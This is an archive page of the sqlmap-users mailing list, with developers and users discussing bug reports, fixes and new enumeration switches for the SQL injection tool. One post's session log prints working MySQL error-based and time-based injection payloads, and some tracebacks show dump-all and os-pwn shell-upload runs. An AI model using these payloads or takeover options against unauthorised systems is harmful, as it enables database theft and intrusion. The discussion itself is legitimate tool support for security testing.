sqlmap-users Mailing List for sqlmap (Page 96)
Brought to you by:
inquisb
You can subscribe to this list here.
2008 |
Jan
|
Feb
|
Mar
|
Apr
|
May
|
Jun
|
Jul
|
Aug
|
Sep
(4) |
Oct
(11) |
Nov
(24) |
Dec
(13) |
---|---|---|---|---|---|---|---|---|---|---|---|---|
2009 |
Jan
(23) |
Feb
(17) |
Mar
(13) |
Apr
(48) |
May
(22) |
Jun
(18) |
Jul
(22) |
Aug
(13) |
Sep
(23) |
Oct
(6) |
Nov
(11) |
Dec
(25) |
2010 |
Jan
(21) |
Feb
(33) |
Mar
(61) |
Apr
(47) |
May
(48) |
Jun
(30) |
Jul
(24) |
Aug
(37) |
Sep
(52) |
Oct
(59) |
Nov
(32) |
Dec
(57) |
2011 |
Jan
(166) |
Feb
(93) |
Mar
(65) |
Apr
(117) |
May
(87) |
Jun
(124) |
Jul
(102) |
Aug
(78) |
Sep
(65) |
Oct
(22) |
Nov
(71) |
Dec
(79) |
2012 |
Jan
(93) |
Feb
(55) |
Mar
(45) |
Apr
(49) |
May
(56) |
Jun
(93) |
Jul
(95) |
Aug
(42) |
Sep
(26) |
Oct
(36) |
Nov
(32) |
Dec
(46) |
2013 |
Jan
(36) |
Feb
(78) |
Mar
(38) |
Apr
(57) |
May
(35) |
Jun
(39) |
Jul
(23) |
Aug
(33) |
Sep
(28) |
Oct
(38) |
Nov
(22) |
Dec
(16) |
2014 |
Jan
(33) |
Feb
(23) |
Mar
(41) |
Apr
(29) |
May
(12) |
Jun
(20) |
Jul
(21) |
Aug
(23) |
Sep
(18) |
Oct
(34) |
Nov
(12) |
Dec
(39) |
2015 |
Jan
(2) |
Feb
(51) |
Mar
(10) |
Apr
(28) |
May
(9) |
Jun
(22) |
Jul
(32) |
Aug
(35) |
Sep
(29) |
Oct
(50) |
Nov
(8) |
Dec
(2) |
2016 |
Jan
(8) |
Feb
(2) |
Mar
(3) |
Apr
(14) |
May
|
Jun
|
Jul
|
Aug
(12) |
Sep
|
Oct
|
Nov
(1) |
Dec
(19) |
2017 |
Jan
|
Feb
(18) |
Mar
|
Apr
(1) |
May
|
Jun
|
Jul
|
Aug
(4) |
Sep
|
Oct
|
Nov
(2) |
Dec
|
2018 |
Jan
|
Feb
|
Mar
(1) |
Apr
(1) |
May
(3) |
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
|
Dec
|
2019 |
Jan
|
Feb
|
Mar
|
Apr
(3) |
May
|
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
|
Dec
|
From: Miroslav S. <mir...@gm...> - 2011-05-03 10:06:09
|
hi all. with the last commit r3829 you'll be warned (in testing connection phase) about this kind of things with something like: [10:18:16] [INFO] testing connection to the target url [10:18:46] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request [10:18:46] [WARNING] if the problem persists please try to rerun with the --random-agent switch turned on [10:19:17] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request [10:19:48] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request kr On Tue, May 3, 2011 at 10:10 AM, Miroslav Stampar <mir...@gm...> wrote: > hi all. > > if you are encountering simptoms like this: > > [10:01:17] [INFO] testing connection to the target url > [10:01:47] [CRITICAL] connection timed out to the target url or proxy, > sqlmap is going to retry the request > [10:02:18] [CRITICAL] connection timed out to the target url or proxy, > sqlmap is going to retry the request > ... > > - while you are able to connect to the target url via browser, please > use --random-agent to get it solved > > thing is that probably either sqlmap is blacklisted by some IDSes > around or the web server itself just refuses requests with "uncommon" > user agents (to prevent spidering and stuff). > > conclusion, use --random-agent in those strange "connection timed out" cases. > > kr > > -- > Miroslav Stampar > > E-mail: miroslav.stampar (at) gmail.com > PGP Key ID: 0xB5397B1B > -- Miroslav Stampar E-mail: miroslav.stampar (at) gmail.com PGP Key ID: 0xB5397B1B |
From: Tom T. <k1...@li...> - 2011-05-03 09:14:12
|
Excellent! Confirmed fixed :) > Date: Sun, 1 May 2011 17:45:19 +0200 > Subject: Re: [sqlmap-users] 32 results from database with 10, 000 rows! (id 90-99, 990-999, 9990-9999) > From: mir...@gm... > To: k1...@li... > CC: sql...@li... > > hi all. > > it's strange that nobody has noticed this till now :))) > > this bug was (in cases when the pivot column used was an integer > based) trimming/preventing dumping of entire table contents of some > DBMSes supported by sqlmap, like MSSQL, Sybase and MaxDB :) > > thank you Tom very much for this report. thing is that we haven't > noticed it till this report because we use fairly small testing > tables. > > now it should be fixed with the last commit > > kr > > On Mon, Apr 25, 2011 at 11:08 AM, Miroslav Stampar > <mir...@gm...> wrote: > > Hi Tom. > > > > I believe i see the connection with our code. That number ranges have > > the root in programs logic. > > > > Will be fixed in a week. > > > > After that hackers will be able to dump all :) > > > > It's just strange that nobody has noticed this in some two weeks as > > that's the time of affecting commit. > > > > Kr > > On Sunday, April 24, 2011, Tom Thumb <k1...@li...> wrote: > >> > >> > >> > >> > >> > >> When trying to dump a table containing over 10000 entries, only 32 results are returned (rows with id 8, 9, 90-99, 990-999, 9990-9999). All the other data is not dumped, and I can't understand why. > >> Can anyone explain this behaviour? > >> Obviously I'm pleased that my database does not appear to be completely exploitable, but I'm worried that I'm missing something simple, and that there is something a hacker could do to retreive the rest of the data... > >> Test subject is an MSSQL 2005 Database runing on Windows 2003. > >> > > > > -- > > Miroslav Stampar > > > > E-mail: miroslav.stampar (at) gmail.com > > PGP Key ID: 0xB5397B1B > > > > > > -- > Miroslav Stampar > > E-mail: miroslav.stampar (at) gmail.com > PGP Key ID: 0xB5397B1B |
From: Tom T. <k1...@li...> - 2011-05-03 09:13:01
|
I'm not getting any files in the 'dump' folder. Also, using --replicate produces the following error: [CRITICAL] unhandled exception in sqlmap/1.0-dev (r3828), retry your run with the latest development version from the Subversion repository. If the exception persists, please send by e-mail to sql...@li... the following text and any information required to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you. sqlmap version: 1.0-dev (r3828) Python version: 2.6.6 Operating system: posix Command line: sqlmap.py --url=***************************************************** --risk=3 --level=5 --forms --dbms=mssql --text-only --threads=3 --dump -D ******* -T ***************** --replicate -v 3 Technique: UNION Back-end DBMS: Microsoft SQL Server (fingerprinted) Traceback (most recent call last): File "sqlmap.py", line 83, in main start() File "/home/tom/Downloads/sqlmap-dev/lib/controller/controller.py", line 485, in start action() File "/home/tom/Downloads/sqlmap-dev/lib/controller/action.py", line 109, in action conf.dumper.dbTableValues(conf.dbmsHandler.dumpTable()) File "/home/tom/Downloads/sqlmap-dev/lib/core/dump.py", line 373, in dbTableValues rtable = replication.createTable(table, cols) File "/home/tom/Downloads/sqlmap-dev/lib/core/replication.py", line 97, in createTable return Replication.Table(parent=self, name=tblname, columns=columns, typeless=typeless) File "/home/tom/Downloads/sqlmap-dev/lib/core/replication.py", line 59, in __init__ self.parent.cursor.execute('CREATE TABLE %s (%s)' % (self.name, ','.join('%s %s' % (colname, coltype) for colname, coltype in self.columns))) OperationalError: unknown database dbo |
From: Miroslav S. <mir...@gm...> - 2011-05-03 08:10:40
|
hi all. if you are encountering simptoms like this: [10:01:17] [INFO] testing connection to the target url [10:01:47] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request [10:02:18] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request ... - while you are able to connect to the target url via browser, please use --random-agent to get it solved thing is that probably either sqlmap is blacklisted by some IDSes around or the web server itself just refuses requests with "uncommon" user agents (to prevent spidering and stuff). conclusion, use --random-agent in those strange "connection timed out" cases. kr -- Miroslav Stampar E-mail: miroslav.stampar (at) gmail.com PGP Key ID: 0xB5397B1B |
From: Miroslav S. <mir...@gm...> - 2011-05-02 12:33:01
|
hi Mike. thank you for your report and find it patched in the latest commit (svn update). kr On Mon, May 2, 2011 at 1:20 PM, Martin Mike <m.m...@ya...> wrote: > unknown charset 'is0-8859-1'. Please report by e-mail to > sql...@li... > > ------------------------------------------------------------------------------ > WhatsUp Gold - Download Free Network Management Software > The most intuitive, comprehensive, and cost-effective network > management toolset available today. Delivers lowest initial > acquisition cost and overall TCO of any competing solution. > http://p.sf.net/sfu/whatsupgold-sd > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar E-mail: miroslav.stampar (at) gmail.com PGP Key ID: 0xB5397B1B |
From: Martin M. <m.m...@ya...> - 2011-05-02 11:20:33
|
unknown charset 'is0-8859-1'. Please report by e-mail to sql...@li... |
From: Miroslav S. <mir...@gm...> - 2011-05-01 21:11:45
|
hi Kirill. for something like this stacked queries should be supported while you can see that from your injection info there is no stacked injection vulnerability (as other command than select cannot be inserted into vulnerable query). kr On Sun, May 1, 2011 at 9:34 PM, Kirill Morozov <l0...@l0...> wrote: > Hi, > is it possible to make "insert/update" queries via sql injection bugs? > I tried at my test machine via "--sql-query", but i didn't see query in > request_uri: > (admin@rpmbuild)-(09:03 PM Tue Apr 26)-(~/sqlmap-dev) > $ python26 sqlmap.py -u "10.0.0.60/sql/user.php?id=1" -t t3.log > --sql-query="insert into users set user='aaa',pass='bbb';" > sqlmap/1.0-dev (r3809) - automatic SQL injection and database takeover > tool > http://sqlmap.sourceforge.net > [*] starting at: 21:07:53 > [21:07:53] [INFO] using '/home/admin/sqlmap-dev/output/10.0.0.60/session' as > session file > [21:07:53] [INFO] resuming injection data from session file > [21:07:53] [INFO] resuming back-end DBMS 'mysql 5.0' from session file > [21:07:53] [INFO] testing connection to the target url > sqlmap identified the following injection points with a total of 0 HTTP(s) > requests: > --- > Place: GET > Parameter: id > Type: error-based > Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause > Payload: id=1 AND (SELECT 1212 FROM(SELECT > COUNT(*),CONCAT(CHAR(58,110,118,103,58),(SELECT (CASE WHEN (1212=1212) THEN > 1 ELSE 0 END)),CHAR(58,117,118,99,58),FLOOR(RAND(0)*2))x FROM > information_schema.tables GROUP BY x)a) > Type: AND/OR time-based blind > Title: MySQL > 5.0.11 AND time-based blind > Payload: id=1 AND SLEEP(5) > --- > [21:07:53] [INFO] the back-end DBMS is MySQL > web server operating system: Linux CentOS 5 > web application technology: Apache 2.2.3, PHP 5.1.6 > back-end DBMS: MySQL 5.0 > do you want to retrieve the SQL statement output? [Y/n/a] > [21:07:54] [INFO] fetching SQL data manipulation query output: 'insert into > users set user='aaa',pass='bbb';' > [21:07:54] [INFO] read from file > '/home/admin/sqlmap-dev/output/10.0.0.60/session': None > [21:07:54] [INFO] read from file > '/home/admin/sqlmap-dev/output/10.0.0.60/session': None > insert into users set user='aaa',pass='bbb'; [2]: > [*] None > [21:07:54] [INFO] Fetched data logged to text files under > '/home/admin/sqlmap-dev/output/10.0.0.60' > [*] shutting down at: 21:07:54 > (admin@rpmbuild)-(09:07 PM Tue Apr 26)-(~/sqlmap-dev) > $ cat t3.log > HTTP request [#1]: > GET /sql/user.php?id=1 HTTP/1.1 > Accept-Encoding: identity > Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7 > Host: 10.0.0.60 > Accept-language: en-us,en;q=0.5 > Pragma: no-cache > Cache-control: no-cache,no-store > User-agent: sqlmap/1.0-dev (r3809) (http://sqlmap.sourceforge.net) > Connection: close > HTTP response [#1] (200 OK): > Content-length: 949 > X-powered-by: PHP/5.1.6 > Uri: http://10.0.0.60:80/sql/user.php?id=1 > Server: Apache/2.2.3 (CentOS) > Connection: close > Date: Tue, 26 Apr 2011 19:07:53 GMT > Content-type: text/html; charset=UTF-8 > HTTP_ACCEPT_ENCODING => identity > HTTP_ACCEPT_LANGUAGE => en-us,en;q=0.5 > HTTP_CONNECTION => close > HTTP_USER_AGENT => sqlmap/1.0-dev (r3809) (http://sqlmap.sourceforge.net) > HTTP_ACCEPT_CHARSET => ISO-8859-15,utf-8;q=0.7,*;q=0.7 > HTTP_HOST => 10.0.0.60 > HTTP_PRAGMA => no-cache > HTTP_CACHE_CONTROL => no-cache,no-store > PATH => /sbin:/usr/sbin:/bin:/usr/bin > SERVER_SIGNATURE => <address>Apache/2.2.3 (CentOS) Server at 10.0.0.60 Port > 80</address> > > SERVER_SOFTWARE => Apache/2.2.3 (CentOS) > SERVER_NAME => 10.0.0.60 > SERVER_ADDR => 10.0.0.60 > SERVER_PORT => 80 > REMOTE_ADDR => 10.0.0.60 > DOCUMENT_ROOT => /var/www/html > SERVER_ADMIN => root@localhost > SCRIPT_FILENAME => /var/www/html/sql/user.php > REMOTE_PORT => 41083 > GATEWAY_INTERFACE => CGI/1.1 > SERVER_PROTOCOL => HTTP/1.1 > REQUEST_METHOD => GET > QUERY_STRING => id=1 > REQUEST_URI => /sql/user.php?id=1 > SCRIPT_NAME => /sql/user.php > PHP_SELF => /sql/user.php > REQUEST_TIME => 1303844873 > ok > ############################################################################ > > -- > Kirill Morozov > KIMO2-RIPE, RHCE > > > > ------------------------------------------------------------------------------ > WhatsUp Gold - Download Free Network Management Software > The most intuitive, comprehensive, and cost-effective network > management toolset available today. Delivers lowest initial > acquisition cost and overall TCO of any competing solution. > http://p.sf.net/sfu/whatsupgold-sd > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar E-mail: miroslav.stampar (at) gmail.com PGP Key ID: 0xB5397B1B |
From: Kirill M. <l0...@l0...> - 2011-05-01 19:34:50
|
Hi, is it possible to make "insert/update" queries via sql injection bugs? I tried at my test machine via "--sql-query", but i didn't see query in request_uri: (admin@rpmbuild)-(09:03 PM Tue Apr 26)-(~/sqlmap-dev) $ python26 sqlmap.py -u "10.0.0.60/sql/user.php?id=1" -t t3.log --sql-query="insert into users set user='aaa',pass='bbb';" sqlmap/1.0-dev (r3809) - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [*] starting at: 21:07:53 [21:07:53] [INFO] using '/home/admin/sqlmap-dev/output/10.0.0.60/session' as session file [21:07:53] [INFO] resuming injection data from session file [21:07:53] [INFO] resuming back-end DBMS 'mysql 5.0' from session file [21:07:53] [INFO] testing connection to the target url sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: id Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: id=1 AND (SELECT 1212 FROM(SELECT COUNT(*),CONCAT(CHAR(58,110,118,103,58),(SELECT (CASE WHEN (1212=1212) THEN 1 ELSE 0 END)),CHAR(58,117,118,99,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=1 AND SLEEP(5) --- [21:07:53] [INFO] the back-end DBMS is MySQL web server operating system: Linux CentOS 5 web application technology: Apache 2.2.3, PHP 5.1.6 back-end DBMS: MySQL 5.0 do you want to retrieve the SQL statement output? [Y/n/a] [21:07:54] [INFO] fetching SQL data manipulation query output: 'insert into users set user='aaa',pass='bbb';' [21:07:54] [INFO] read from file '/home/admin/sqlmap-dev/output/ 10.0.0.60/session': None [21:07:54] [INFO] read from file '/home/admin/sqlmap-dev/output/ 10.0.0.60/session': None insert into users set user='aaa',pass='bbb'; [2]: [*] None [21:07:54] [INFO] Fetched data logged to text files under '/home/admin/sqlmap-dev/output/10.0.0.60' [*] shutting down at: 21:07:54 (admin@rpmbuild)-(09:07 PM Tue Apr 26)-(~/sqlmap-dev) $ cat t3.log HTTP request [#1]: GET /sql/user.php?id=1 HTTP/1.1 Accept-Encoding: identity Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7 Host: 10.0.0.60 Accept-language: en-us,en;q=0.5 Pragma: no-cache Cache-control: no-cache,no-store User-agent: sqlmap/1.0-dev (r3809) (http://sqlmap.sourceforge.net) Connection: close HTTP response [#1] (200 OK): Content-length: 949 X-powered-by: PHP/5.1.6 Uri: http://10.0.0.60:80/sql/user.php?id=1 Server: Apache/2.2.3 (CentOS) Connection: close Date: Tue, 26 Apr 2011 19:07:53 GMT Content-type: text/html; charset=UTF-8 HTTP_ACCEPT_ENCODING => identity HTTP_ACCEPT_LANGUAGE => en-us,en;q=0.5 HTTP_CONNECTION => close HTTP_USER_AGENT => sqlmap/1.0-dev (r3809) (http://sqlmap.sourceforge.net) HTTP_ACCEPT_CHARSET => ISO-8859-15,utf-8;q=0.7,*;q=0.7 HTTP_HOST => 10.0.0.60 HTTP_PRAGMA => no-cache HTTP_CACHE_CONTROL => no-cache,no-store PATH => /sbin:/usr/sbin:/bin:/usr/bin SERVER_SIGNATURE => <address>Apache/2.2.3 (CentOS) Server at 10.0.0.60 Port 80</address> SERVER_SOFTWARE => Apache/2.2.3 (CentOS) SERVER_NAME => 10.0.0.60 SERVER_ADDR => 10.0.0.60 SERVER_PORT => 80 REMOTE_ADDR => 10.0.0.60 DOCUMENT_ROOT => /var/www/html SERVER_ADMIN => root@localhost SCRIPT_FILENAME => /var/www/html/sql/user.php REMOTE_PORT => 41083 GATEWAY_INTERFACE => CGI/1.1 SERVER_PROTOCOL => HTTP/1.1 REQUEST_METHOD => GET QUERY_STRING => id=1 REQUEST_URI => /sql/user.php?id=1 SCRIPT_NAME => /sql/user.php PHP_SELF => /sql/user.php REQUEST_TIME => 1303844873 ok ############################################################################ -- Kirill Morozov KIMO2-RIPE, RHCE |
From: Miroslav S. <mir...@gm...> - 2011-05-01 15:45:26
|
hi all. it's strange that nobody has noticed this till now :))) this bug was (in cases when the pivot column used was an integer based) trimming/preventing dumping of entire table contents of some DBMSes supported by sqlmap, like MSSQL, Sybase and MaxDB :) thank you Tom very much for this report. thing is that we haven't noticed it till this report because we use fairly small testing tables. now it should be fixed with the last commit kr On Mon, Apr 25, 2011 at 11:08 AM, Miroslav Stampar <mir...@gm...> wrote: > Hi Tom. > > I believe i see the connection with our code. That number ranges have > the root in programs logic. > > Will be fixed in a week. > > After that hackers will be able to dump all :) > > It's just strange that nobody has noticed this in some two weeks as > that's the time of affecting commit. > > Kr > On Sunday, April 24, 2011, Tom Thumb <k1...@li...> wrote: >> >> >> >> >> >> When trying to dump a table containing over 10000 entries, only 32 results are returned (rows with id 8, 9, 90-99, 990-999, 9990-9999). All the other data is not dumped, and I can't understand why. >> Can anyone explain this behaviour? >> Obviously I'm pleased that my database does not appear to be completely exploitable, but I'm worried that I'm missing something simple, and that there is something a hacker could do to retreive the rest of the data... >> Test subject is an MSSQL 2005 Database runing on Windows 2003. >> > > -- > Miroslav Stampar > > E-mail: miroslav.stampar (at) gmail.com > PGP Key ID: 0xB5397B1B > -- Miroslav Stampar E-mail: miroslav.stampar (at) gmail.com PGP Key ID: 0xB5397B1B |
From: Bernardo D. A. G. <ber...@gm...> - 2011-04-30 23:58:48
|
Hi, During the last two days we have worked extensively on these three switches as well as needed adjustments to the brand new --schema switch (thanks David for suggesting it!) and --dbs. The outcome is: * Redesign of the plugins' methods that deal with these switches. * Homogeneous code and behaviour across the different DBMS. * More user-friendly logging messages. * Standardized new functionalities. The new functionalities consists in: * --tables now properly accept either no -D or a list of comma separated databases (e.g. --tables -D testdb1,testdb2) and --exclude-sysdbs is considered always. * --columns: * You can provide no extra parameters (as in -D, -T, -C) leading to a call to --schema to enumerate the full DBMS schema (read, all databases' tables' columns). * You can provide -D only (one database name is allowed) and no extra parameters (as in -T, -C) leading to an enumeration of all tables' columns for the provided database. * You can provide -T only (comma separated tables are allowed) leading to retrieval of current database and subsequent enumeration of all columns for the provided table(s) on the current database. * You can provide -D (one database name is allowed) and -T (comma separated tables are allowed) leading to retrieval of all columns of the provided table(s) on the provided database. * You can provide -C only (comma separated columns are allowed) leading to retrieval of current database, enumeration of all tables in the current database and subsequent enumeration of all the columns "LIKE" the one(s) provided within the current database's tables. * You can provide -C (comma separated columns are allowed) and -T (comma separated tables are allowed) leading to retrieval of current database and subsequent enumeration of all the columns "LIKE" the one(s) provided within the provided tables in the current database. * You can provide -C (comma separated columns are allowed) and -D (one database name is allowed) leading to enumeration of all tables in the provided database and subsequent enumeration of all the columns "LIKE" the one(s) provided within all tables in the provided database. * You can provide -D, -T and -C to be very specify in which database's table(s) column(s) you want to enumerate. In all cases, --exclude-sysdbs is supported (of course, when -T is not provided) and the relevant datatype for the enumerated columns is shown also. I tested throughly these new implementation and it seems to work pretty well on my test environment, however I would be very grateful if you report any bug or unexpected behaviour, as usual. Thank you, Bernardo -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) PGP Key ID: 0x05F5A30F |
From: Miroslav S. <mir...@gm...> - 2011-04-30 22:40:09
|
hi Andrew. thank you for your report. find it fixed in the latest commit (r3804). kr On Fri, Apr 29, 2011 at 11:48 PM, Andrew Gecse <and...@up...> wrote: > [23:46:20] [WARNING] unknown web page charset 'hungarian-iso-8859-2'. > Please report by e-mail > > > ------------------------------------------------------------------------------ > WhatsUp Gold - Download Free Network Management Software > The most intuitive, comprehensive, and cost-effective network > management toolset available today. Delivers lowest initial > acquisition cost and overall TCO of any competing solution. > http://p.sf.net/sfu/whatsupgold-sd > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Miroslav Stampar E-mail: miroslav.stampar (at) gmail.com PGP Key ID: 0xB5397B1B |
From: Bernardo D. A. G. <ber...@gm...> - 2011-04-30 13:28:38
|
You are running sqlmap with a version of Python below 2.6. sqlmap is supported on Python 2.6 and 2.7 at the moment. Bernardo On 30 April 2011 09:14, You know my name <64...@ma...> wrote: > установил python, c свна залил склмап,запускаю и эрор > > -sh-3.2# ./sqlmap.py > File "./sqlmap.py", line 119 > finally: > ^ > SyntaxError: invalid syntax > > > -sh-3.2# python sqlmap.py > File "sqlmap.py", line 119 > finally: > ^ > SyntaxError: invalid syntax > > ------------------------------------------------------------------------------ > WhatsUp Gold - Download Free Network Management Software > The most intuitive, comprehensive, and cost-effective network > management toolset available today. Delivers lowest initial > acquisition cost and overall TCO of any competing solution. > http://p.sf.net/sfu/whatsupgold-sd > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) PGP Key ID: 0x05F5A30F |
From: You k. my n. <64...@ma...> - 2011-04-30 08:14:58
|
установил python, c свна залил склмап,запускаю и эрор -sh-3.2# ./sqlmap.py File "./sqlmap.py", line 119 finally: ^ SyntaxError: invalid syntax -sh-3.2# python sqlmap.py File "sqlmap.py", line 119 finally: ^ SyntaxError: invalid syntax |
From: Bernardo D. A. G. <ber...@gm...> - 2011-04-30 00:25:09
|
Hi, On 26 April 2011 04:00, David Guimaraes <sk...@gm...> wrote: > How about a --count switch? To count the number of rows (like sqlsus do)... > and what about column enumerator without setting some table(-T) or DB (-D)? The --count switch has also been implemented. It works like this: count the number of entries for a specific table (when -T is provided - supports multiple tables, comma separated), all database's tables (when only -D is provided) or all databases' tables when neither -D nor -T are provided. Thanks for sending these feature requests. Cheers, Bernardo -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) PGP Key ID: 0x05F5A30F |
From: Andrew G. <and...@up...> - 2011-04-29 21:48:37
|
[23:46:20] [WARNING] unknown web page charset 'hungarian-iso-8859-2'. Please report by e-mail |
From: Miroslav S. <mir...@gm...> - 2011-04-29 16:56:15
|
hi Ahmed thank you again for reporting. find it fixed in the latest commit (r3781). kr On Mon, Apr 25, 2011 at 10:58 AM, Miroslav Stampar <mir...@gm...> wrote: > Hi Ahmed. > > Thanks for reporting. > > This will be fixed at the end of the week. It requires overwritting of > some poorly written system methods. > > Sending from Bernardo's place in London :) > > KR > On Monday, April 25, 2011, Bernardo Damele A. G. > <ber...@gm...> wrote: >> What is the language of the web application? Can you provide us >> privately with full output of -v 3 --flush-session please? >> >> Bernardo >> >> On 25 April 2011 09:31, Ahmed Shawky <ah...@is...> wrote: >>> it based uploading shell with the latest reversion (r3770) but here is >>> another issue >>> [10:30:07] [CRITICAL] unhandled exception in sqlmap/1.0-dev (r3770), retry >>> your run with the latest development version from the Subversion repository. >>> If the exception persists, please send by e-mail to >>> sql...@li... the following text and any information >>> required to reproduce the bug. The developers will try to reproduce the bug, >>> fix it accordingly and get back to you. >>> sqlmap version: 1.0-dev (r3770) >>> Python version: 2.7 >>> Operating system: posix >>> Command line: ./sqlmap.py -u >>> ******************************************************* -p id --text-only >>> --cookie PHPSESSID=omqf68n95iss0op71odobvnhh4; security=low --os-pwn >>> Technique: UNION >>> Back-end DBMS: MySQL (fingerprinted) >>> Traceback (most recent call last): >>> File "./sqlmap.py", line 83, in main >>> start() >>> File "/pentest/database/sqlmap/lib/controller/controller.py", line 485, in >>> start >>> action() >>> File "/pentest/database/sqlmap/lib/controller/action.py", line 136, in >>> action >>> conf.dbmsHandler.osPwn() >>> File "/pentest/database/sqlmap/plugins/generic/takeover.py", line 245, in >>> osPwn >>> self.uploadShellcodeexec(web=web) >>> File "/pentest/database/sqlmap/lib/takeover/metasploit.py", line 560, in >>> uploadShellcodeexec >>> self.webFileUpload(self.shellcodeexecLocal, self.shellcodeexecRemote, >>> self.webDirectory) >>> File "/pentest/database/sqlmap/lib/takeover/web.py", line 77, in >>> webFileUpload >>> retVal = self.__webFileStreamUpload(inputFP, destFileName, directory) >>> File "/pentest/database/sqlmap/lib/takeover/web.py", line 96, in >>> __webFileStreamUpload >>> page = Request.getPage(url=self.webStagerUrl, multipart=multipartParams, >>> raise404=False) >>> File "/pentest/database/sqlmap/lib/request/connect.py", line 130, in >>> getPage >>> conn = multipartOpener.open(url, multipart) >>> File "/usr/lib/python2.7/urllib2.py", line 391, in open >>> response = self._open(req, data) >>> File "/usr/lib/python2.7/urllib2.py", line 409, in _open >>> '_open', req) >>> File "/usr/lib/python2.7/urllib2.py", line 369, in _call_chain >>> result = func(*args) >>> File "/usr/lib/python2.7/urllib2.py", line 1173, in http_open >>> return self.do_open(httplib.HTTPConnection, req) >>> File "/usr/lib/python2.7/urllib2.py", line 1142, in do_open >>> h.request(req.get_method(), req.get_selector(), req.data, headers) >>> File "/usr/lib/python2.7/httplib.py", line 946, in request >>> self._send_request(method, url, body, headers) >>> File "/usr/lib/python2.7/httplib.py", line 987, in _send_request >>> self.endheaders(body) >>> File "/usr/lib/python2.7/httplib.py", line 940, in endheaders >>> self._send_output(message_body) >>> File "/usr/lib/python2.7/httplib.py", line 801, in _send_output >>> msg += message_body >>> UnicodeDecodeError: 'ascii' codec can't decode byte 0x84 in position 396: >>> ordinal not in range(128) >>> [*] shutting down at: 10:30:07 >>> On Mon, Apr 25, 2011 at 10:27 AM, Ahmed Shawky <ah...@is...> wrote: >>>> >>>> there is an issue when sqlmap comes to shell upload via os-shell or >>>> os-pwn >>>> [10:24:59] [CRITICAL] unhandled exception in sqlmap/1.0-dev (r3767), retry >>>> your run with the latest development version from the Subversion repository. >>>> If the exception persists, please send by e> ------------------------------------------------------------------------------ >>> Fulfilling the Lean Software Promise >>> Lean software platforms are now widely adopted and the benefits have been >>> demonstrated beyond question. Learn why your peers are replacing JEE >>> containers with lightweight application servers - and what you can gain >>> from the move. http://p.sf.net/sfu/vmware-sfemails >>> _______________________________________________ >>> sqlmap-users mailing list >>> sql...@li... >>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>> >>> >> >> >> >> -- >> Bernardo Damele A. G. >> >> E-mail / Jabber: bernardo.damele (at) gmail.com >> Mobile: +447788962949 (UK 07788962949) >> PGP Key ID: 0x05F5A30F >> >> ------------------------------------------------------------------------------ >> Fulfilling the Lean Software Promise >> Lean software platforms are now widely adopted and the benefits have been >> demonstrated beyond question. Learn why your peers are replacing JEE >> containers with lightweight application servers - and what you can gain >> from the move. http://p.sf.net/sfu/vmware-sfemails >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> > > -- > Miroslav Stampar > > E-mail: miroslav.stampar (at) gmail.com > PGP Key ID: 0xB5397B1B > -- Miroslav Stampar E-mail: miroslav.stampar (at) gmail.com PGP Key ID: 0xB5397B1B |
From: Miroslav S. <mir...@gm...> - 2011-04-29 14:33:19
|
hi Jacco. could you please retry with the latest revision and report back the results? an update (r3778) has been commited this moment regarding this bug report. kr On Wed, Apr 27, 2011 at 11:49 AM, Jacco van Tuijl <jac...@gm...> wrote: > [11:08:16] [WARNING] HTTP error codes detected during testing: > 403 (Forbidden) - 11 times, 500 (Internal Server Error) - 6103 times > > [11:08:16] [CRITICAL] unhandled exception in sqlmap/1.0-dev (r3770), retry > your > run with the latest development version from the Subversion repository. If > the e > xception persists, please send by e-mail to > sql...@li... t > he following text and any information required to reproduce the bug. The > develop > ers will try to reproduce the bug, fix it accordingly and get back to you. > sqlmap version: 1.0-dev (r3770) > Python version: 2.7.1 > Operating system: nt > Command line: sqlmap.py -u > ***************************************************** > **************************** --dump-all --random-agent > --proxy=http://127.0.0.1: > 8118 --check-payload > Technique: UNION > Back-end DBMS: Microsoft SQL Server (fingerprinted) > Traceback (most recent call last): > File "sqlmap.py", line 83, in main > start() > File "C:\sqlmap-0.9\lib\controller\controller.py", line 485, in start > action() > File "C:\sqlmap-0.9\lib\controller\action.py", line 106, in action > conf.dbmsHandler.dumpAll() > File "C:\sqlmap-0.9\plugins\generic\enumeration.py", line 1525, in dumpAll > data = self.dumpTable() > File "C:\sqlmap-0.9\plugins\generic\enumeration.py", line 1337, in > dumpTable > entries = zip(*[entries[colName] for colName in colList]) > KeyError: u'Synonym' > > ------------------------------------------------------------------------------ > WhatsUp Gold - Download Free Network Management Software > The most intuitive, comprehensive, and cost-effective network > management toolset available today. Delivers lowest initial > acquisition cost and overall TCO of any competing solution. > 